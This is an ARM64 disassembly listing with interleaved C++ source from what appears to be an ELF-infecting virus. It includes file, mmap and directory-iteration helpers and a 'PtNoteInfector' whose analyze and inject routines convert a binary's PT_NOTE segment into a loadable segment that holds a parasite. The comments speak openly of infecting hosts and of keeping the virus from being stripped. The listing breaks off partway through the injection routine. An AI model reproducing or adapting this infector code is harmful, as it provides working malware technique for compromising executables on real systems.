    1624:	f9400c00 	ldr	x0, [x0, #24]
    1628:	b40000a0 	cbz	x0, 163c <vt::common::Mmap<1>::~Mmap()+0x20>
      CHECK_NE(vt::munmap(base_, size_), -1);
    162c:	f9400101 	ldr	x1, [x8]
    1630:	940001ab 	bl	1cdc <vt::munmap(void*, unsigned long)>
    1634:	3100041f 	cmn	w0, #0x1
    1638:	54000060 	b.eq	1644 <vt::common::Mmap<1>::~Mmap()+0x28>  // b.none
  }
    163c:	f84107fe 	ldr	x30, [sp], #16
    1640:	d65f03c0 	ret
      CHECK_NE(vt::munmap(base_, size_), -1);
    1644:	940001df 	bl	1dc0 <vt::exit(int)>

0000000000001648 <vt::common::FileDescriptor::FileDescriptor(char const*, int, int)>:
      : flags_(flags), mode_(mode) {
    1648:	a9bf4ffe 	stp	x30, x19, [sp, #-16]!
    164c:	aa0003f3 	mov	x19, x0
    1650:	aa0103e0 	mov	x0, x1
    1654:	12800008 	mov	w8, #0xffffffff            	// #-1
    fd_ = vt::open(path, flags_, mode_);
    1658:	2a0203e1 	mov	w1, w2
      : flags_(flags), mode_(mode) {
    165c:	29000e62 	stp	w2, w3, [x19]
    fd_ = vt::open(path, flags_, mode_);
    1660:	2a0303e2 	mov	w2, w3
  int fd_ = -1;
    1664:	b9000a68 	str	w8, [x19, #8]
    fd_ = vt::open(path, flags_, mode_);
    1668:	9400015d 	bl	1bdc <vt::open(char const*, int, unsigned int)>
    if (fd_ == -1) {
    166c:	3100041f 	cmn	w0, #0x1
    fd_ = vt::open(path, flags_, mode_);
    1670:	b9000a60 	str	w0, [x19, #8]
    if (fd_ == -1) {
    1674:	54000060 	b.eq	1680 <vt::common::FileDescriptor::FileDescriptor(char const*, int, int)+0x38>  // b.none
  }
    1678:	a8c14ffe 	ldp	x30, x19, [sp], #16
    167c:	d65f03c0 	ret
      CHECK_FAIL();
    1680:	940001d0 	bl	1dc0 <vt::exit(int)>

0000000000001684 <vt::common::Mmap<3>::Mmap(unsigned long, int, int, unsigned long)>:
      : size_(size), flags_(flags), offset_(offset) {
    1684:	a9bf4ffe 	stp	x30, x19, [sp, #-16]!
    1688:	aa0403e5 	mov	x5, x4
    168c:	2a0303e4 	mov	w4, w3
    1690:	2a0203e3 	mov	w3, w2
    1694:	aa0003f3 	mov	x19, x0
    1698:	f9000001 	str	x1, [x0]
    169c:	b9000802 	str	w2, [x0, #8]
    auto ret = vt::mmap(nullptr, size, PROT, flags, fd, offset);
    16a0:	52800062 	mov	w2, #0x3                   	// #3
      : size_(size), flags_(flags), offset_(offset) {
    16a4:	a9017c05 	stp	x5, xzr, [x0, #16]
    auto ret = vt::mmap(nullptr, size, PROT, flags, fd, offset);
    16a8:	aa1f03e0 	mov	x0, xzr
    16ac:	94000184 	bl	1cbc <vt::mmap(void*, unsigned long, int, int, int, long)>
    if (ret == MAP_FAILED) {
    16b0:	b100041f 	cmn	x0, #0x1
    16b4:	54000080 	b.eq	16c4 <vt::common::Mmap<3>::Mmap(unsigned long, int, int, unsigned long)+0x40>  // b.none
      base_ = static_cast<std::byte*>(ret);
    16b8:	f9000e60 	str	x0, [x19, #24]
  }
    16bc:	a8c14ffe 	ldp	x30, x19, [sp], #16
    16c0:	d65f03c0 	ret
      CHECK_FAIL();
    16c4:	12800000 	mov	w0, #0xffffffff            	// #-1
    16c8:	940001be 	bl	1dc0 <vt::exit(int)>

00000000000016cc <vt::common::Mmap<3>::~Mmap()>:
  ~Mmap() {
    16cc:	f81f0ffe 	str	x30, [sp, #-16]!
    16d0:	aa0003e8 	mov	x8, x0
    if (base_ != nullptr) {
    16d4:	f9400c00 	ldr	x0, [x0, #24]
    16d8:	b40000a0 	cbz	x0, 16ec <vt::common::Mmap<3>::~Mmap()+0x20>
      CHECK_NE(vt::munmap(base_, size_), -1);
    16dc:	f9400101 	ldr	x1, [x8]
    16e0:	9400017f 	bl	1cdc <vt::munmap(void*, unsigned long)>
    16e4:	3100041f 	cmn	w0, #0x1
    16e8:	54000060 	b.eq	16f4 <vt::common::Mmap<3>::~Mmap()+0x28>  // b.none
  }
    16ec:	f84107fe 	ldr	x30, [sp], #16
    16f0:	d65f03c0 	ret
      CHECK_NE(vt::munmap(base_, size_), -1);
    16f4:	940001b3 	bl	1dc0 <vt::exit(int)>

00000000000016f8 <vt::common::DirectoryIterator::Iterator::Iterator(int)>:
  }
}
}  // namespace

DirectoryIterator::Iterator::Iterator(int directory_fd)
    : directory_fd_(directory_fd) {
    16f8:	a9be57fe 	stp	x30, x21, [sp, #-32]!
    16fc:	a9014ff4 	stp	x20, x19, [sp, #16]
    1700:	52820208 	mov	w8, #0x1010                	// #4112
}

bool DirectoryIterator::Iterator::fill() {
  buf_pos_ = 0;
  total_filled_ = vt::getdents64(
      directory_fd_, reinterpret_cast<vt::linux_dirent64*>(buf_), sizeof(buf_));
    1704:	91002014 	add	x20, x0, #0x8
    1708:	aa0003f3 	mov	x19, x0
    Entry cur_{};
    170c:	8b080015 	add	x21, x0, x8
    : directory_fd_(directory_fd) {
    1710:	29007c01 	stp	w1, wzr, [x0]
  total_filled_ = vt::getdents64(
    1714:	52820002 	mov	w2, #0x1000                	// #4096
    1718:	f9080c1f 	str	xzr, [x0, #4120]
  buf_pos_ = 0;
    171c:	f908041f 	str	xzr, [x0, #4104]
  total_filled_ = vt::getdents64(
    1720:	2a0103e0 	mov	w0, w1
    1724:	aa1403e1 	mov	x1, x20
    1728:	390002bf 	strb	wzr, [x21]
    172c:	940001a8 	bl	1dcc <vt::getdents64(int, vt::linux_dirent64*, int)>
  if (fill()) {
    1730:	7100041f 	cmp	w0, #0x1
  total_filled_ = vt::getdents64(
    1734:	b9000660 	str	w0, [x19, #4]
  if (fill()) {
    1738:	5400034b 	b.lt	17a0 <vt::common::DirectoryIterator::Iterator::Iterator(int)+0xa8>  // b.tstop
  return total_filled_ > 0;
}

void DirectoryIterator::Iterator::consume() {
  auto* cur_entry = reinterpret_cast<vt::linux_dirent64*>(buf_ + buf_pos_);
    173c:	f9480668 	ldr	x8, [x19, #4104]
    1740:	d280006c 	mov	x12, #0x3                   	// #3
    1744:	f2c0002c 	movk	x12, #0x1, lsl #32
    1748:	f2e0004c 	movk	x12, #0x2, lsl #48
    174c:	8b080289 	add	x9, x20, x8
  cur_ = Entry{.type = get_type(cur_entry->d_type), .name = cur_entry->d_name};
    1750:	3940492a 	ldrb	w10, [x9, #18]
  switch (type) {
    1754:	5100114a 	sub	w10, w10, #0x4
    1758:	92401d4b 	and	x11, x10, #0xff
    175c:	71001d5f 	cmp	w10, #0x7
    1760:	d37df16b 	lsl	x11, x11, #3
    1764:	9acb258a 	lsr	x10, x12, x11
  cur_ = Entry{.type = get_type(cur_entry->d_type), .name = cur_entry->d_name};
    1768:	91004d2b 	add	x11, x9, #0x13
  switch (type) {
    176c:	1a9f314a 	csel	w10, w10, wzr, cc  // cc = lo, ul, last
  cur_ = Entry{.type = get_type(cur_entry->d_type), .name = cur_entry->d_name};
    1770:	f9080e6b 	str	x11, [x19, #4120]
    1774:	390002aa 	strb	w10, [x21]
  buf_pos_ += cur_entry->d_reclen;
    1778:	7940212a 	ldrh	w10, [x9, #16]
    177c:	8b0a0108 	add	x8, x8, x10
    1780:	f9080668 	str	x8, [x19, #4104]
  if (cur_.name[0] == '.') {
    1784:	39404d28 	ldrb	w8, [x9, #19]
    1788:	7100b91f 	cmp	w8, #0x2e
    178c:	540000a1 	b.ne	17a0 <vt::common::DirectoryIterator::Iterator::Iterator(int)+0xa8>  // b.any
    return ++(*this);
    1790:	aa1303e0 	mov	x0, x19
    1794:	a9414ff4 	ldp	x20, x19, [sp, #16]
    1798:	a8c257fe 	ldp	x30, x21, [sp], #32
    179c:	14000004 	b	17ac <vt::common::DirectoryIterator::Iterator::operator++()>
}
    17a0:	a9414ff4 	ldp	x20, x19, [sp, #16]
    17a4:	a8c257fe 	ldp	x30, x21, [sp], #32
    17a8:	d65f03c0 	ret

00000000000017ac <vt::common::DirectoryIterator::Iterator::operator++()>:
DirectoryIterator::Iterator& DirectoryIterator::Iterator::operator++() {
    17ac:	a9be57fe 	stp	x30, x21, [sp, #-32]!
    17b0:	a9014ff4 	stp	x20, x19, [sp, #16]
    17b4:	52820209 	mov	w9, #0x1010                	// #4112
    17b8:	aa0003f3 	mov	x19, x0
    17bc:	91002014 	add	x20, x0, #0x8
  if (buf_pos_ >= total_filled_) {
    17c0:	f9480408 	ldr	x8, [x0, #4104]
    17c4:	8b090015 	add	x21, x0, x9
    17c8:	b9400400 	ldr	w0, [x0, #4]
    17cc:	eb20c11f 	cmp	x8, w0, sxtw
    17d0:	54000143 	b.cc	17f8 <vt::common::DirectoryIterator::Iterator::operator++()+0x4c>  // b.lo, b.ul, b.last
      directory_fd_, reinterpret_cast<vt::linux_dirent64*>(buf_), sizeof(buf_));
    17d4:	b9400260 	ldr	w0, [x19]
  total_filled_ = vt::getdents64(
    17d8:	aa1403e1 	mov	x1, x20
    17dc:	52820002 	mov	w2, #0x1000                	// #4096
  buf_pos_ = 0;
    17e0:	f908067f 	str	xzr, [x19, #4104]
  total_filled_ = vt::getdents64(
    17e4:	9400017a 	bl	1dcc <vt::getdents64(int, vt::linux_dirent64*, int)>
    if (fill()) {
    17e8:	7100041f 	cmp	w0, #0x1
  total_filled_ = vt::getdents64(
    17ec:	b9000660 	str	w0, [x19, #4]
    if (fill()) {
    17f0:	5400038b 	b.lt	1860 <vt::common::DirectoryIterator::Iterator::operator++()+0xb4>  // b.tstop
  auto* cur_entry = reinterpret_cast<vt::linux_dirent64*>(buf_ + buf_pos_);
    17f4:	f9480668 	ldr	x8, [x19, #4104]
    17f8:	8b080289 	add	x9, x20, x8
    17fc:	39404929 	ldrb	w9, [x9, #18]
    1800:	7100113f 	cmp	w9, #0x4
    1804:	540000e0 	b.eq	1820 <vt::common::DirectoryIterator::Iterator::operator++()+0x74>  // b.none
    1808:	7100213f 	cmp	w9, #0x8
    180c:	540000e0 	b.eq	1828 <vt::common::DirectoryIterator::Iterator::operator++()+0x7c>  // b.none
    1810:	7100293f 	cmp	w9, #0xa
    1814:	540000e1 	b.ne	1830 <vt::common::DirectoryIterator::Iterator::operator++()+0x84>  // b.any
    1818:	52800049 	mov	w9, #0x2                   	// #2
    181c:	14000006 	b	1834 <vt::common::DirectoryIterator::Iterator::operator++()+0x88>
    1820:	52800069 	mov	w9, #0x3                   	// #3
    1824:	14000004 	b	1834 <vt::common::DirectoryIterator::Iterator::operator++()+0x88>
    1828:	52800029 	mov	w9, #0x1                   	// #1
    182c:	14000002 	b	1834 <vt::common::DirectoryIterator::Iterator::operator++()+0x88>
    1830:	2a1f03e9 	mov	w9, wzr
    1834:	8b08028a 	add	x10, x20, x8
    1838:	390002a9 	strb	w9, [x21]
    183c:	91004d4b 	add	x11, x10, #0x13
    1840:	f9080e6b 	str	x11, [x19, #4120]
    1844:	79402149 	ldrh	w9, [x10, #16]
    1848:	8b090108 	add	x8, x8, x9
    184c:	f9080668 	str	x8, [x19, #4104]
  if (cur_.name[0] == '.') {
    1850:	39404d49 	ldrb	w9, [x10, #19]
    1854:	7100b93f 	cmp	w9, #0x2e
    1858:	54fffba0 	b.eq	17cc <vt::common::DirectoryIterator::Iterator::operator++()+0x20>  // b.none
    185c:	1400000c 	b	188c <vt::common::DirectoryIterator::Iterator::operator++()+0xe0>
      *this = {};
    1860:	aa1403e0 	mov	x0, x20
    1864:	2a1f03e1 	mov	w1, wzr
    1868:	52820002 	mov	w2, #0x1000                	// #4096
    186c:	94000145 	bl	1d80 <memset>
    1870:	2f00e5e0 	movi	d0, #0xffffffff
    1874:	52820228 	mov	w8, #0x1011                	// #4113
    1878:	f908067f 	str	xzr, [x19, #4104]
    187c:	390002bf 	strb	wzr, [x21]
    1880:	f8286a7f 	str	xzr, [x19, x8]
    1884:	fd000260 	str	d0, [x19]
    1888:	f9080e7f 	str	xzr, [x19, #4120]
}
    188c:	aa1303e0 	mov	x0, x19
    1890:	a9414ff4 	ldp	x20, x19, [sp, #16]
    1894:	a8c257fe 	ldp	x30, x21, [sp], #32
    1898:	d65f03c0 	ret

000000000000189c <vt::common::get_parasite_start_address()>:
  std::byte* ret = nullptr;
  //  1: get the parasite_start symbol's page address
  //  2: add the lower 12 bits offset to acquire full address.
  //  3: return to caller.
#if defined(__aarch64__)
  asm("adrp %0, __parasite_start\n"
    189c:	d503201f 	nop
    18a0:	10ffbb00 	adr	x0, 1000 <__parasite_start>
  // att syntax
  asm("lea __parasite_start(%%rip), %0\n" : "=r"(ret));
#else
#error "not supported arch"
#endif
  return ret;
    18a4:	d65f03c0 	ret

00000000000018a8 <vt::common::get_parasite_len()>:
}

std::byte* get_parasite_end_address() {
  std::byte* ret = nullptr;
#if defined(__aarch64__)
  asm("adrp %0, __parasite_end\n"
    18a8:	d503201f 	nop
    18ac:	10002be8 	adr	x8, 1e28 <__parasite_end>
  asm("adrp %0, __parasite_start\n"
    18b0:	d503201f 	nop
    18b4:	10ffba69 	adr	x9, 1000 <__parasite_start>
#endif
  return ret;
}

std::ptrdiff_t get_parasite_len() {
  return get_parasite_end_address() - get_parasite_start_address();
    18b8:	cb090100 	sub	x0, x8, x9
    18bc:	d65f03c0 	ret

00000000000018c0 <vt::common::get_patch_return_offset_from_parasite_start()>:
  asm("adrp %0, _patch_return\n"
    18c0:	d503201f 	nop
    18c4:	10ffbae8 	adr	x8, 1020 <_patch_return>
  asm("adrp %0, __parasite_start\n"
    18c8:	d503201f 	nop
    18cc:	10ffb9a9 	adr	x9, 1000 <__parasite_start>
}

ptrdiff_t get_patch_return_offset_from_parasite_start() {
  return get_parasite_patch_address() - get_parasite_start_address();
    18d0:	cb090100 	sub	x0, x8, x9
    18d4:	d65f03c0 	ret
	...

00000000000018e0 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)>:
}

}  // namespace

bool PtNoteInfector::analyze(std::span<const std::byte> host_mapping,
                             std::span<const std::byte> parasite_mapping) {
    18e0:	a9bf4ffe 	stp	x30, x19, [sp, #-16]!
  host_size_ = host_mapping.size();
  parasite_size_ = parasite_mapping.size();
  const auto& ehdr = reinterpret_cast<const Elf64_Ehdr&>(host_mapping.front());
  if ((ehdr.e_type != ET_EXEC && ehdr.e_type != ET_DYN) ||
    18e4:	79402028 	ldrh	w8, [x1, #16]
  host_size_ = host_mapping.size();
    18e8:	a9001002 	stp	x2, x4, [x0]
  if ((ehdr.e_type != ET_EXEC && ehdr.e_type != ET_DYN) ||
    18ec:	121f3908 	and	w8, w8, #0xfffe
    18f0:	7100091f 	cmp	w8, #0x2
    18f4:	54000da1 	b.ne	1aa8 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x1c8>  // b.any
      ehdr.e_ident[EI_CLASS] != ELFCLASS64) {
    18f8:	39401028 	ldrb	w8, [x1, #4]
  if ((ehdr.e_type != ET_EXEC && ehdr.e_type != ET_DYN) ||
    18fc:	7100091f 	cmp	w8, #0x2
    1900:	54000d41 	b.ne	1aa8 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x1c8>  // b.any
  }

  const auto& phdr =
      reinterpret_cast<const Elf64_Phdr&>(host_mapping[ehdr.e_phoff]);

  original_e_entry_ = ehdr.e_entry;
    1904:	a941a829 	ldp	x9, x10, [x1, #24]
    1908:	79407028 	ldrh	w8, [x1, #56]
    190c:	f9000809 	str	x9, [x0, #16]

  // Find code segment
  const Elf64_Phdr* phdr_entry = &phdr;
  for (size_t i = 0; i < ehdr.e_phnum; ++i, ++phdr_entry) {
    1910:	b40003c8 	cbz	x8, 1988 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0xa8>
    1914:	8b01014b 	add	x11, x10, x1
    1918:	aa1f03e9 	mov	x9, xzr
    191c:	f940140a 	ldr	x10, [x0, #40]
    1920:	9100c16b 	add	x11, x11, #0x30
    if (phdr_entry->p_type == PT_LOAD) {
    1924:	b85d016c 	ldur	w12, [x11, #-48]
    1928:	7100119f 	cmp	w12, #0x4
    192c:	54000200 	b.eq	196c <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x8c>  // b.none
    1930:	7100059f 	cmp	w12, #0x1
    1934:	54000221 	b.ne	1978 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x98>  // b.any
      // the parasite should have a loading address avoiding all other LOAD
      // segments.
      auto last_byte_of_segment = phdr_entry->p_vaddr + phdr_entry->p_memsz - 1;
    1938:	a97fb96d 	ldp	x13, x14, [x11, #-8]
    193c:	f85e016c 	ldur	x12, [x11, #-32]
    1940:	8b0c01ac 	add	x12, x13, x12
namespace vt::common {
template <typename T>
T round_up_to(T v, uint64_t alignment) {
  static_assert(std::is_unsigned<T>::value, "unsigned type required.");

  return (v & ~(alignment - 1)) + alignment;
    1944:	cb0e03ed 	neg	x13, x14
    1948:	8a0d018c 	and	x12, x12, x13
    194c:	8a0d004d 	and	x13, x2, x13
    1950:	8b0e018c 	add	x12, x12, x14
      auto potential_virus_loading_addr = last_byte_of_segment + 1;
      parasite_load_address_ =
          std::max(parasite_load_address_,
    1954:	eb0c015f 	cmp	x10, x12
    1958:	9a8c814a 	csel	x10, x10, x12, hi  // hi = pmore
    195c:	8b0e01ac 	add	x12, x13, x14
                   common::round_up_to(potential_virus_loading_addr,
                                       phdr_entry->p_align));
      // copy alignment so later we can assign to PT_NOTE.
      pt_load_alignment_ = phdr_entry->p_align;
    1960:	a902b80a 	stp	x10, x14, [x0, #40]
      virus_offset_ =
    1964:	f900100c 	str	x12, [x0, #32]
    1968:	14000004 	b	1978 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x98>
    } else if (phdr_entry->p_type == PT_NOTE) {
      // We found the last PT_NOTE section that can be infected, because
      // GNU_PROPERTY (for example on x86-64) might overlap with the first. On
      // aarch64, it doesn't have such problem.
      pt_note_to_be_infected_idx_ = i;
      original_pt_note_file_offset_ = phdr_entry->p_offset;
    196c:	f85d816c 	ldur	x12, [x11, #-40]
      pt_note_to_be_infected_idx_ = i;
    1970:	f9001c09 	str	x9, [x0, #56]
      original_pt_note_file_offset_ = phdr_entry->p_offset;
    1974:	f9000c0c 	str	x12, [x0, #24]
  for (size_t i = 0; i < ehdr.e_phnum; ++i, ++phdr_entry) {
    1978:	91000529 	add	x9, x9, #0x1
    197c:	9100e16b 	add	x11, x11, #0x38
    1980:	eb09011f 	cmp	x8, x9
    1984:	54fffd01 	b.ne	1924 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x44>  // b.any
    // Do not early break out because we must scan all LOAD segments to find the
    // highest vaddress.
  }

  // There is no pt_note. Give up.
  if (pt_note_to_be_infected_idx_ == 0) {
    1988:	f9401c08 	ldr	x8, [x0, #56]
    198c:	b40008e8 	cbz	x8, 1aa8 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x1c8>
    return false;
  }

  // Check if this is compiled from golang, which relies on the note section to
  // work. We cannot mutate it.
  auto sht_entry_count = ehdr.e_shnum;
    1990:	79407828 	ldrh	w8, [x1, #60]
  auto* shdr = reinterpret_cast<const Elf64_Shdr*>(&host_mapping[ehdr.e_shoff]);
  auto shstrtab_idx = ehdr.e_shstrndx;
  auto shstrtab = &host_mapping[(shdr + shstrtab_idx)->sh_offset];
  for (size_t i = 0; i < sht_entry_count; ++i) {
    1994:	b4000308 	cbz	x8, 19f4 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x114>
    1998:	f9401429 	ldr	x9, [x1, #40]
    199c:	79407c2a 	ldrh	w10, [x1, #62]
    19a0:	8b09002b 	add	x11, x1, x9
    19a4:	8b0a196a 	add	x10, x11, x10, lsl #6
    19a8:	8b01012b 	add	x11, x9, x1
    19ac:	f9400d4a 	ldr	x10, [x10, #24]
    19b0:	8b0a0029 	add	x9, x1, x10
    19b4:	9100116a 	add	x10, x11, #0x4
    19b8:	aa0803eb 	mov	x11, x8
    auto cur_entry = shdr + i;
    if (cur_entry->sh_type == SHT_NOTE) {
    19bc:	b940014c 	ldr	w12, [x10]
    19c0:	71001d9f 	cmp	w12, #0x7
    19c4:	54000121 	b.ne	19e8 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x108>  // b.any
      const auto* name =
          reinterpret_cast<const char*>(shstrtab + cur_entry->sh_name);
    19c8:	b85fc14c 	ldur	w12, [x10, #-4]
    19cc:	8b0c012c 	add	x12, x9, x12
      if (name[6] == 'g' && name[7] == 'o') {
    19d0:	3940198d 	ldrb	w13, [x12, #6]
    19d4:	71019dbf 	cmp	w13, #0x67
    19d8:	54000081 	b.ne	19e8 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x108>  // b.any
    19dc:	39401d8c 	ldrb	w12, [x12, #7]
    19e0:	7101bd9f 	cmp	w12, #0x6f
    19e4:	54000380 	b.eq	1a54 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x174>  // b.none
  for (size_t i = 0; i < sht_entry_count; ++i) {
    19e8:	f100056b 	subs	x11, x11, #0x1
    19ec:	9101014a 	add	x10, x10, #0x40
    19f0:	54fffe61 	b.ne	19bc <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0xdc>  // b.any
  // if in the rare case that host is some weirdo, that actually has data at the
  // end of the file after section header table, do not infect because it's
  // likely there are other issues preventing it from working. For example, the
  // binary distributed by bazel does this https://github.com/bazelbuild/bazel
  if (parasite_load_address_ <=
      host_mapping.size() - ehdr.e_shnum * ehdr.e_shentsize) {
    19f4:	79407429 	ldrh	w9, [x1, #58]
  if (parasite_load_address_ <=
    19f8:	f940140a 	ldr	x10, [x0, #40]
      host_mapping.size() - ehdr.e_shnum * ehdr.e_shentsize) {
    19fc:	9ba88928 	umsubl	x8, w9, w8, x2
  if (parasite_load_address_ <=
    1a00:	eb08015f 	cmp	x10, x8
    1a04:	54000069 	b.ls	1a10 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x130>  // b.plast
    1a08:	52800020 	mov	w0, #0x1                   	// #1
    1a0c:	14000028 	b	1aac <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x1cc>
    auto s = STR_LITERAL("gave up because there are bytes appended\n");
    1a10:	10000053 	adr	x19, 1a18 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x138>
    1a14:	1400000f 	b	1a50 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x170>
    1a18:	65766167 	.word	0x65766167
    1a1c:	20707520 	.word	0x20707520
    1a20:	6562      	.short	0x6562
    1a22:	63          	.byte	0x63
    1a23:	61          	.byte	0x61
    1a24:	20657375 	.word	0x20657375
    1a28:	72656874 	.word	0x72656874
    1a2c:	72612065 	.word	0x72612065
    1a30:	79622065 	.word	0x79622065
    1a34:	20736574 	.word	0x20736574
    1a38:	65707061 	.word	0x65707061
    1a3c:	6465646e 	.word	0x6465646e
    1a40:	0000000a 	.word	0x0000000a
    1a44:	d503201f 	.word	0xd503201f
    1a48:	d503201f 	.word	0xd503201f
    1a4c:	d503201f 	.word	0xd503201f
    1a50:	14000010 	b	1a90 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x1b0>
        auto s = STR_LITERAL("cannot infect elf compiled from golang\n");
    1a54:	10000053 	adr	x19, 1a5c <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x17c>
    1a58:	1400000e 	b	1a90 <vt::infector::PtNoteInfector::analyze(std::__1::span<std::byte const, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x1b0>
    1a5c:	6e6e6163 	.word	0x6e6e6163
    1a60:	6920746f 	.word	0x6920746f
    1a64:	6365666e 	.word	0x6365666e
    1a68:	6c652074 	.word	0x6c652074
    1a6c:	6f632066 	.word	0x6f632066
    1a70:	6c69706d 	.word	0x6c69706d
    1a74:	66206465 	.word	0x66206465
    1a78:	206d6f72 	.word	0x206d6f72
    1a7c:	616c6f67 	.word	0x616c6f67
    1a80:	000a676e 	.word	0x000a676e
    1a84:	d503201f 	.word	0xd503201f
    1a88:	d503201f 	.word	0xd503201f
    1a8c:	d503201f 	.word	0xd503201f
    1a90:	aa1303e0 	mov	x0, x19
    1a94:	940000b5 	bl	1d68 <vt::strlen(char const*)>
    1a98:	aa0003e2 	mov	x2, x0
    1a9c:	52800020 	mov	w0, #0x1                   	// #1
    1aa0:	aa1303e1 	mov	x1, x19
    1aa4:	940000d9 	bl	1e08 <vt::write(int, void const*, unsigned long)>
    1aa8:	2a1f03e0 	mov	w0, wzr
    vt::write(1, s, vt::strlen(s));
    return false;
  }

  return true;
}
    1aac:	a8c14ffe 	ldp	x30, x19, [sp], #16
    1ab0:	d65f03c0 	ret

0000000000001ab4 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)>:

std::optional<InjectionResult> PtNoteInfector::inject(
    std::span<std::byte> host_mapping,
    std::span<const std::byte> parasite_mapping) {
    1ab4:	f81e0ffe 	str	x30, [sp, #-32]!
    1ab8:	a9014ff4 	stp	x20, x19, [sp, #16]

  {
    auto& mutable_phdr =
        reinterpret_cast<Elf64_Phdr&>(host_mapping[ehdr.e_phoff]);
    patch_phdr(mutable_phdr, virus_size, virus_offset_,
               pt_note_to_be_infected_idx_, pt_load_alignment_,
    1abc:	a9432c0c 	ldp	x12, x11, [x0, #48]
    1ac0:	52800709 	mov	w9, #0x38                  	// #56
    1ac4:	aa0803f3 	mov	x19, x8
        reinterpret_cast<Elf64_Phdr&>(host_mapping[ehdr.e_phoff]);
    1ac8:	f940102a 	ldr	x10, [x1, #32]
  pt_note_to_be_infected->p_memsz = virus_size;
    1acc:	4e080c81 	dup	v1.2d, x4
               parasite_load_address_);
    1ad0:	f9401408 	ldr	x8, [x0, #40]
    1ad4:	8b0a002a 	add	x10, x1, x10
  auto* pt_note_to_be_infected = &phdr + pt_note_to_be_infected_idx;
    1ad8:	9b09296b 	madd	x11, x11, x9, x10
    1adc:	9000000a 	adrp	x10, 1000 <__parasite_start>
    patch_phdr(mutable_phdr, virus_size, virus_offset_,
    1ae0:	f9401009 	ldr	x9, [x0, #32]
  pt_note_to_be_infected->p_paddr = parasite_load_address;
    1ae4:	4e080d00 	dup	v0.2d, x8
  pt_note_to_be_infected->p_type = PT_LOAD;
    1ae8:	fd471142 	ldr	d2, [x10, #3616]
  auto sht_entry_count = ehdr.e_shnum;
    1aec:	7940782a 	ldrh	w10, [x1, #60]
  pt_note_to_be_infected->p_vaddr = parasite_load_address;
    1af0:	ad008560 	stp	q0, q1, [x11, #16]
  pt_note_to_be_infected->p_align = pt_load_alignment;
    1af4:	f900196c 	str	x12, [x11, #48]
  pt_note_to_be_infected->p_offset = virus_offset;
    1af8:	f9000569 	str	x9, [x11, #8]
  pt_note_to_be_infected->p_type = PT_LOAD;
    1afc:	fd000162 	str	d2, [x11]
  for (size_t i = 0; i < sht_entry_count; ++i) {
    1b00:	b40005aa 	cbz	x10, 1bb4 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x100>

  {
    // mutate a note section entry to cover our virus so it doesn't get
    // stripped.
    auto& mutable_shdr =
        reinterpret_cast<Elf64_Shdr&>(host_mapping[ehdr.e_shoff]);
    1b04:	f940142c 	ldr	x12, [x1, #40]
    1b08:	aa0003f4 	mov	x20, x0
    1b0c:	f9400c0d 	ldr	x13, [x0, #24]
    1b10:	8b0c002b 	add	x11, x1, x12
    if (section_entry->sh_offset == original_pt_note_file_offset) {
    1b14:	f9400d6e 	ldr	x14, [x11, #24]
    1b18:	eb0d01df 	cmp	x14, x13
    1b1c:	54000121 	b.ne	1b40 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x8c>  // b.any
    1b20:	5280002a 	mov	w10, #0x1                   	// #1
    1b24:	528000cc 	mov	w12, #0x6                   	// #6
    1b28:	5280080d 	mov	w13, #0x40                  	// #64
      section_entry->sh_offset = virus_offset;
    1b2c:	a9019169 	stp	x9, x4, [x11, #24]
      section_entry->sh_type = SHT_PROGBITS;
